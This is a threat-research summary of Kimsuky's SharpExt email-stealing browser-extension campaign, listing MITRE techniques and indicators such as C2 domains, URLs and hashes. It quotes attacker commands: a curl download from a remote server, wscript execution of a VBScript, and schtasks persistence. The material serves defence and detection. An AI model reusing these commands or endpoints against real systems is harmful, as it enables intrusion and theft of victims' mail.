Threat Research

Pivoting on a SharpExt to profile Kimsuky panels for great good

Securonix

SharpExt is a browser-extension malware used by Kimsuky to steal emails and attachments, as detailed by Volexity and related researchers. The campaign maps to older activity, leverages a large network of domains for delivery and C2, and targets US, Europe, and South Korea, with multiple IOCs and script-based payloads observed. #SharpExt #Kimsuky #Volexity #Huntress #UltraViewer #NuclearPolicy101

Keypoints

  • SharpExt is a browser extension malware used by the Kimsuky threat actor to steal emails and attachments.
  • Researchers connected SharpExt activity to earlier campaigns (2021 reports) and to a site used by Kimsuky (nuclearpolicy101.org).
  • The campaign delivers via PowerShell, batch files, DLLs, and VBScript/wscript-based components delivered alongside the browser extension.
  • Infrastructure uses a broad set of domain hosts and C2 servers to control the extension and deliver payloads (e.g., gonamod.com, souibi.com, nuclearpolicy101.org).
  • Persistence and execution involve scheduled tasks (schtasks) and registry/Word/Office-related abuse to enable ongoing execution.
  • Older campaigns reportedly used UltraViewer, and the operators continue to use Hangul Word Processor documents (HWP) in some engagements.
  • Recovered documents and a long list of IOCs indicate active, ongoing operations and a wide victimology footprint across several regions.

MITRE Techniques

  • [T1059.001] PowerShell – The actors use PowerShell components as part of delivery. Quote: (‘the various powershell, batch files, DLLs and browser extensions that are delivered’)
  • [T1059.003] Windows Command Shell – Batch and shell commands observed (e.g., curl commands and startup scripts). Quote: (‘… delivered.’)
  • [T1059.005] VBScript – VBScript files executed via wscript.exe. Quote: (‘wscript.exe /b “%appdata%microsoftwindowscolegg3.vbs”‘)
  • [T1105] Ingress Tool Transfer – Files fetched from remote servers as part of the payload delivery. Quote: (‘curl -o “%appdata%microsoftwindows1.xml” https://…’)
  • [T1053.005] Scheduled Task/Job – Persistence via scheduled tasks. Quote: (‘schtasks /create /tn IdleSetting /xml %appdata%microsoftwindows1.xml /f’)
  • [T1071.001] Web Protocols – C2 activity and file delivery over web infrastructure. Quote: (‘Some of the other domains are leveraged for C2 activity from the browser extension along with any necessary files needed by the browser extension.’)

Indicators of Compromise

  • [Domain] C2/domains used by campaigns – gonamod.com, souibi.com, nuclearpolicy101.org (compromised)
  • [Domain] Additional hosting domains linked to campaigns – dusieme.com, eislesf.live, siekis.com
  • [URL] C2 and delivery endpoints – gonamod.com/sanghyon/index.php, nuclearpolicy101.org/wp-admin/includes/0421/d.php?na=vbtmp
  • [Hash] Recovered document hashes – 42805ec97173c4a074580d473aeecbe4, b57e9474698823fcb300ad29b2ddd657
  • [Document] Recovered documents referenced in the campaign – The Burden of the Unintended.hwp, Interview memo_Gareth.doc
  • [File] Distributed/used files (examples) – cow.php, d.php, r.php, sc.php (and 2 more files)

Read more: https://medium.com/walmartglobaltech/pivoting-on-a-sharpext-to-profile-kimusky-panels-for-great-good-1920dc1bcef9